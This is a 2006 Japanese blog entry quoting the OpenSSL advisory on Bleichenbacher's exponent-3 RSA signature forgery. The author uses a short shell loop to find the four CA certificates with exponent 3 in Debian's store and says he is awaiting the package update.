<前の日記(2006-09-01) 次の日記(2006-09-06)> 最新

おおいわのこめんと (2006-09-05)


2006-09-05

[Security] OpenSSL Security Advisory [5th September 2006] (その1)

Daniel Bleichenbacher recently described an attack on PKCS #1 v1.5 signatures. If an RSA key with exponent 3 is used it may be possible to forge a PKCS #1 v1.5 signature signed by that key. Implementations may incorrectly verify the certificate if they are not checking for excess data in the RSA exponentiation result of the signature.

うひゃー。とりあえず OpenSSL は出たけど、他の実装はどうなのかなぁ。 「OpenSSL のちょっと間抜けなチェック忘れ」とも言えるけど、 一方で他に有っても不思議ではないしなぁ……。

Since there are CAs using exponent 3 in wide use, and PKCS #1 v1.5 is used in X.509 certificates, all software that uses OpenSSL to verify X.509 certificates is potentially vulnerable, as well as any other use of PKCS #1 v1.5. This includes software that uses OpenSSL for SSL or TLS.

だそうなのだが、正直「えー、ふつー e = 65537 っしょ」と思ったので、 とりあえず Debian の標準CA証明書群から e = 3 のサーバ証明書を探してみた。

sh-2.05b$ for f in *.pem; do
> if openssl x509 -in $f -noout -text | grep 'Exponent..* 3 '
> then echo $f
> fi; done
                Exponent: 3 (0x3)
Digital_Signature_Trust_Co._Global_CA_1.pem
                Exponent: 3 (0x3)
Digital_Signature_Trust_Co._Global_CA_3.pem
                Exponent: 3 (0x3)
Entrust.net_Secure_Personal_CA.pem
                Exponent: 3 (0x3)
Entrust.net_Secure_Server_CA.pem

うーむ……。4つもあったのか……。 無効化するにはそれなりに広く使われてそうな CA がありますねぇ。 手元ではとりあえず Debian package のアップデート待ち状態。

攻撃の数学的詳細は、186::Diaryさんに 解説されている模様。

[TrackBack URL: http://www.oiwa.jp/~yutaka/tdiary/trackback.rb/20060905 (note: TrackBacks are moderated: spams will not be shown.) ]

大岩 寛 (おおいわ ゆたか) <yutaka@oiwa.jp.nospam ... remove .nospam> .

Copyright © 2005-2014 Yutaka OIWA. All rights reserved.
Posted comments and trackbacks are copyrighted by their respective posters.

記事の内容について (Disclaimer / Terms and Conditions)